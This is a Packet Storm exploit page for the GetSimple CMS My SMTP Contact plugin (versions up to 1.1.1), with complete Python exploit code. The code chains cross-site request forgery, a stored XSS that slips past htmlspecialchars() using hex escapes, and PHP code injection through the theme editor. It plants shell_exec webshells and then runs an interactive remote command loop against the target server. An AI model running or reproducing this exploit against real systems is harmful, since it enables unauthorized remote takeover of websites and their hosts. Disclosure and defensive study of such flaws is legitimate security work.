exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GetSimple CMS My SMTP Contact 1.1.1 CSRF/ XSS / Code Execution

GetSimple CMS My SMTP Contact 1.1.1 CSRF/ XSS / Code Execution
Posted Apr 23, 2021
Authored by Bobby Cooke

GetSimple CMS My SMTP Contact plugin versions 1.1.1 and below cross site request forgery to persistent cross site scripting to remote code execution exploit.

tags | exploit, remote, code execution, xss, csrf
SHA-256 | 41f7e0ef54e05dad22d7753afc0b084638622f4b9593b685c302c7652a13556c

GetSimple CMS My SMTP Contact 1.1.1 CSRF/ XSS / Code Execution

Change Mirror Download
# Exploit Title: GetSimple CMS My SMTP Contact Plugin <= v1.1.1 - CSRF to Stored XSS to RCE
# Exploit Author: Bobby Cooke (boku)
# Date: April 22nd, 2021
# Vendor Homepage: http://get-simple.info &
# Software Link: http://get-simple.info/download/
# Version: Exploit <= v1.1.1 | Stored XSS <= v1.1.2
# Tested against Server Host: Windows 10 Pro + XAMPP
# Tested against Client Browsers: Firefox (Linix & Windows), Internet Explorer
# Vendor: NetExplorer
# Exploit Description:
# The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. The PHP function htmlspecialchars() attempts to sanitize the user-input, but is trivially bypassed by passing the dangerous characters as escaped hex bytes. This allows attackers to breakout of the HTML rendered by the PHP engine, to run arbitrary client-side code within the admins browser; after the admin submits the POST request from the CSRF attack. Since GetSimple CMS suffers from a known PHP code injection vulnerability within the themes edit page, the attacker can ride the admins session to perform a chain of XHR requests within the admins browser. The XHR chain triggered by the CSRF attack will collect the CSRF Token from the themes edit page, and use the token to exploit the PHP Code Injection vulnerability to upload a webshell within every page hosted by the CMS.
# Full Disclosure: github.com/boku7/gsSMTP-Csrf2Xss2RCE/
# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
# CVSS Base Score: 9.6

import argparse,requests
from http.server import BaseHTTPRequestHandler, HTTPServer
from colorama import (Fore as F, Back as B, Style as S)
from threading import Thread
from time import sleep

FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')

class theTHREADER(object):
def __init__(self, interval=1):
self.interval = interval
thread = Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
run()

def webshell(target):
try:
websh = "{}/webshell.php".format(target,page)
term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST)
welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
print(welcome)
while True:
specialmove = input(term)
command = {'FierceGodKick': specialmove}
r = requests.post(websh, data=command, verify=False)
status = r.status_code
if status != 200:
r.raise_for_status()
response = r.text
print(response)
except:
pass


''' Breakout of the PHP and inject a <script> tag using escaped Hex codepoints to bypass the htmlspecialchars() PHP function
htmlspecailchars() only HTML encodes the chars: &"><'
"+><script>alert(1)</script> --> \x22\x2b\x3e\x3cscript\x3ealert(1)\x3c/script\x3e
PAYLOAD
- Replace alert(1) payload above with the XHR Chain to gain RCE
- XHR Chain first collects the CSRF token on the theme-edit.php page,
then uses the token to inject PHP code into all pages of the CMS via known vulnerable themes component of core application'''
def xhrRcePayload():
hexBreakoutOpen = '\\x22\\x2b\\x3e\\x3cscript\\x3e'
payload = 'var e=function(i){return encodeURIComponent(i);};'
payload += 'var h=\\x22application/x-www-form-urlencoded\\x22;'
payload += 'var u=\\x22/admin/theme-edit.php\\x22;'
payload += 'var xhr1=new XMLHttpRequest();'
payload += 'var xhr2=new XMLHttpRequest();'
payload += 'xhr1.onreadystatechange=function(){'
payload += 'if(xhr1.readyState==4 \\x26\\x26 xhr1.status==200){'
payload += 'r=this.responseXML;'
payload += 'nVal=r.querySelector(\\x22#nonce\\x22).value;'
payload += 'eVal=r.forms[1][2].defaultValue;'
payload += 'xhr2.open(\\x22POST\\x22,u,true);'
payload += 'xhr2.setRequestHeader(\\x22Content-Type\\x22,h);'
# for the $_REQUEST[solarflare] used for the webshell via shell_exec(), hex-escape the $ or else it will render in the PHP engine to early in the exploit chain
payload += 'payload=e(\\x22\\x3c?php echo shell_exec(\\x24_REQUEST[solarflare]) ?\\x3e\\x22);'
payload += 'params=\\x22nonce=\\x22+nVal+\\x22\\x26content=\\x22+payload+\\x22\\x26edited_file=\\x22+eVal+\\x22\\x26submitsave=Save+Changes\\x22;'
payload += 'xhr2.send(params);'
payload += '}};'
payload += 'xhr1.open(\\x22GET\\x22,u,true);'
payload += 'xhr1.responseType=\\x22document\\x22;'
payload += 'xhr1.send();'
hexBreakoutClose = '\\x3c/script\\x3e'
return hexBreakoutOpen + payload + hexBreakoutClose

def csrfPayload():
payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">'
payload += '<input type="hidden" name="act" value="addsettings">'
payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">'
payload += '<input type="hidden" name="m_smtp_c_sender_name" value="'+xhrRcePayload()+'">'
payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="395ed33a5ae4476">'
payload += '<input type="submit" value="Submit request">'
payload += '</form><body>'
return payload

class S(BaseHTTPRequestHandler):
def do_GET(self):
victim = self.client_address
victim = "{}:{}".format(victim[0],victim[1])
print("{} connected to Malicious CSRF Site!".format(victim))
self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))

def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Stopping httpd...')

def tryUploadWebshell(target,page):
try:
blind = target+page
# The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"}
requests.post(url=blind, data=webshUpload, verify=False)
except:
pass

def checkWebshell(target):
try:
websh = "{}/webshell.php".format(target)
capsule = {'FierceGodKick':'pwnt?'}
resp = requests.post(url=websh, data=capsule, verify=False)
return resp.status_code
except:
pass

def sig():
SIG = SB+FY+" .-----.._ ,--.\n"
SIG += FY+" | .. > ___ | | .--.\n"
SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __\n"
SIG += FY+" | </ "+FR+"* * *"+FY+" \ / \\/ \\\n"
SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\\n"
SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += FY+" _______"+FR+"github.com/boku7"+FY+"_____\n"+ST
return SIG

def argsetup():
about = SB+FB+' The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
parser.add_argument('Target',type=str,help=desc1)
desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
parser.add_argument('PublicPage',type=str,help=desc2)
args = parser.parse_args()
return args

if __name__ == '__main__':
header = SB+FR+' My SMTP Contact GetSimple CMS Plugin\n'
header += SB+FM+'CSRF '+FT+'-->'+FM+' Stored XSS '+FT+'-->'+FM+' XHR PHP Code Injection '+FT+'-->'+FM+' RCE\n'+ST
header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke\n'+ST
print(header)
args = argsetup()
target = args.Target
page = args.PublicPage
print(sig())
theTHREADER()
pwnt = checkWebshell(target)
if pwnt != 200:
while pwnt != 200:
sleep(3)
tryUploadWebshell(target,page)
sleep(2)
pwnt = checkWebshell(target)
print("{} A wild webshell appears!".format(ok))
webshell(target)

Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close